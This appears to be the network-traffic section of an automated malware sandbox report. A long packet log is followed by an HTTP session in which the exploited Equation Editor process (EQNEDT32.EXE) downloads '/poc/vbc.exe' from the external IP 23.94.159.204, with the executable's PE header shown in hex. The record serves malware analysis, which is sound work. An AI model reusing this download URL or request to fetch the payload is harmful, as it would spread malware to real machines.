            Sep 27, 2021 21:08:40.534596920 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:40.534627914 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:40.534668922 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:40.534689903 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:40.534722090 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:40.537391901 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:40.656250954 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:40.656296015 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:40.656315088 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:40.656338930 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:40.656363010 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:40.656380892 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:40.656402111 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:40.656424046 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:40.656446934 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:40.656471968 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:40.656562090 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:40.659472942 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:40.660202026 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:40.776928902 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:40.776966095 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:40.776981115 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:40.776999950 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:40.777015924 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:40.777199030 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:40.780639887 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:40.780690908 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:40.780715942 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:40.780735970 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:40.780771971 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:40.780798912 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:40.780814886 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:40.780818939 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:40.780823946 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:40.780827045 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:40.780829906 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:40.780857086 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:40.898677111 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:40.898715019 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:40.898735046 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:40.898757935 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:40.898780107 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:40.899015903 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:40.901362896 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:40.901398897 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:40.901426077 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:40.901451111 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:40.901560068 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:40.901570082 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:40.901577950 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:40.901598930 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:40.901603937 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:40.901623011 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:40.901650906 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:40.902578115 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:41.019630909 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.019675970 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.019936085 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:41.020494938 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.020526886 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.020576954 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.020596981 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:41.020606995 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.020628929 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:41.020658970 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:41.022811890 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.022851944 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.022886992 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.022911072 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:41.022942066 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:41.023130894 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:41.031629086 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.031675100 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.031758070 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:41.033196926 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:41.141140938 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.141225100 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.141366959 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:41.141388893 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:41.141407967 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.141488075 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:41.141608000 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.141724110 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.141748905 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.141776085 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:41.141791105 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:41.141803980 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:41.144037962 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.144129992 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:41.144145966 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.144227982 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:41.152729988 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.152839899 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:41.266639948 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.266774893 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.266819954 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.266856909 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.266973972 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:41.266999006 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:41.267479897 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:41.267502069 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:41.274451017 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.274615049 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:41.388583899 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.388731003 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:41.396466017 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.396614075 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:41.397936106 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.397978067 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.399447918 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.399492979 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.401164055 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:41.401202917 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:41.401209116 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:41.401213884 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:41.401218891 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:41.509973049 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.510993958 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:41.517638922 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.517810106 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:41.522325039 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.522367001 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.522393942 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.522418022 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.522439003 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.522480011 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:41.522500992 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:41.522505999 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:41.527496099 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:41.632560968 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.632632017 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:41.638772011 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.638874054 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:41.643944979 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.643996000 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.644016027 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.644037962 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:41.644042969 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.644054890 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:41.644085884 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:41.648397923 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.648451090 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:41.648452044 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.648487091 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:41.753173113 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.753354073 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:41.766885996 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.766911983 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.766927004 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.766946077 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.766966105 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.766988039 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.767065048 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:41.767087936 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:41.769582033 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.769629002 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.769706011 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:41.769730091 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:41.874247074 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.874536991 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:41.888874054 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.888916969 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.888936996 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.888962030 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.888987064 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.889010906 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.889034033 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.889168024 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:41.889194965 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:41.891571999 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.891707897 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:41.892065048 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.892122984 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:41.995589018 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.995794058 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.010854006 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.010986090 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.011033058 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.011059999 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.011104107 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.011152029 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.011178970 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.011265039 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.011271954 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.012393951 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.012420893 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.012604952 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.012815952 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.012907028 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.015032053 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.116766930 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.116952896 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.131865978 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.131926060 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.131964922 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.132005930 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.132045984 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.132059097 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.132097006 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.132102966 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.132112026 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.132143021 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.132157087 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.132200003 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.133241892 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.133284092 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.133312941 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.133325100 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.133337021 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.133363962 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.133374929 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.133408070 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.237364054 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.237430096 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.252968073 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.252995968 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.253016949 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.253021955 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.253037930 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.253042936 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.253062010 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.253077030 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.253107071 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.253125906 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.253143072 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.253148079 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.253180027 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.253374100 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.254421949 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.254443884 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.254467010 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.254477978 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.254482031 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.254522085 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.254534006 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.254539967 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.254561901 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.254575968 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.389844894 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.389870882 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.389889002 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.389906883 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.389924049 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.389942884 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.389951944 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.389962912 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.389976025 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.389992952 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.390001059 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.390006065 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.390010118 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.390011072 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.390012026 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.390021086 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.390038967 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.390042067 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.390054941 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.390068054 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.390084028 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.390084982 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.390105009 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.390114069 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.390124083 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.390142918 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.510437012 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.510519981 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.510533094 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.510571957 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.510576963 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.510587931 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.510636091 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.510656118 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.510678053 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.510694981 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.510725975 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.510732889 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.510737896 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.510777950 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.510780096 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.510812044 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.510852098 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.510869026 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.510889053 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.510902882 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.513681889 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.516159058 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.631812096 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.632013083 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.938872099 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.939076900 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:43.059823036 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:43.060022116 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:43.720458031 CEST4916780192.168.2.2223.94.159.204

            HTTP Request Dependency Graph

            • 23.94.159.204

            HTTP Packets

            Session IDSource IPSource PortDestination IPDestination PortProcess
            0192.168.2.224916723.94.159.20480C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
            TimestampkBytes transferredDirectionData
            Sep 27, 2021 21:08:39.563868999 CEST0OUTGET /poc/vbc.exe HTTP/1.1
            Accept: */*
            Accept-Encoding: gzip, deflate
            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
            Host: 23.94.159.204
            Connection: Keep-Alive
            Sep 27, 2021 21:08:39.688463926 CEST1INHTTP/1.1 200 OK
            Date: Mon, 27 Sep 2021 19:08:39 GMT
            Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/8.0.10
            Last-Modified: Mon, 27 Sep 2021 07:27:42 GMT
            ETag: "46591-5ccf50857974b"
            Accept-Ranges: bytes
            Content-Length: 288145
            Keep-Alive: timeout=5, max=100
            Connection: Keep-Alive
            Content-Type: application/x-msdownload
            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 30 28 81 e9 51 46 d2 e9 51 46 d2 e9 51 46 d2 2a 5e 19 d2 eb 51 46 d2 e9 51 47 d2 71 51 46 d2 2a 5e 1b d2 e6 51 46 d2 bd 72 76 d2 e3 51 46 d2 2e 57 40 d2 e8 51 46 d2 52 69 63 68 e9 51 46 d2 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 6d 3a ff 56 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 60 00 00 00 84 02 00 00 04 00 00 2a 31 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 80 03 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 75 00 00 a0 00 00 00 00 70 03 00 e0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 7c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 66 5e 00 00 00 10 00 00 00 60 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a2 12 00 00 00 70 00 00 00 14 00 00 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 18 5d 02 00 00 90 00 00 00 06 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 e0 09 00 00 00 70 03 00 00 0a 00 00 00 7e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$0(QFQFQF*^QFQGqQF*^QFrvQF.W@QFRichQFPELm:V`*1p@$upp|.textf^` `.rdatapd@@.data]x@.ndata.rsrcp~@@
